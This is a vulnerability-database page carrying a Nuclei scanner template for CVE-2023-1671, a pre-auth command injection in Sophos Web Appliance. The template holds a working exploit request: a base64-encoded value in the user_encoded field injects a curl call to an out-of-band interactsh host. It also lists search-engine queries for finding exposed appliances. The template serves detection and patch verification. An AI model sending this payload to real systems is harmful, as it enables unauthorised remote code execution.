Sophos Web Appliance - Remote Code Execution

2023-04-2715:42:42

ProjectDiscovery

github.com

sophos

remote code execution

command injection

vulnerability

patch

interactsh

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.965 High

EPSS

Percentile

99.6%

JSON

A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.

id: CVE-2023-1671

info:
  name: Sophos Web Appliance - Remote Code Execution
  author: Co5mos
  severity: critical
  description: |
    A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
  reference:
    - https://vulncheck.com/blog/cve-2023-1671-analysis
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1671
    - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html
    - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
    - https://github.com/lions2012/Penetration_Testing_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1671
    cwe-id: CWE-77
    epss-score: 0.96909
    epss-percentile: 0.99711
    cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sophos
    product: web_appliance
    shodan-query:
      - title:"Sophos Web Appliance"
      - http.title:"sophos web appliance"
      - http.favicon.hash:-893681401
    fofa-query:
      - title="Sophos Web Appliance"
      - title="sophos web appliance"
      - icon_hash=-893681401
    google-query: intitle:"sophos web appliance"
  tags: cve2023,cve,packetstorm,rce,sophos,oast,kev

http:
  - raw:
      - |
        POST /index.php?c=blocked&action=continue HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64("\';curl http://{{interactsh-url}} #")}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a004730450221008621e6fc19234e974d3b243fc784b9fc10e4fb849bc846258bb7a3f94d3524a80220303b2f3b771c041e111c4eebbb296b758f819b74a66b3b5c1ddf8ccbe777372e:922c64590222798bb761d5b6d8e72950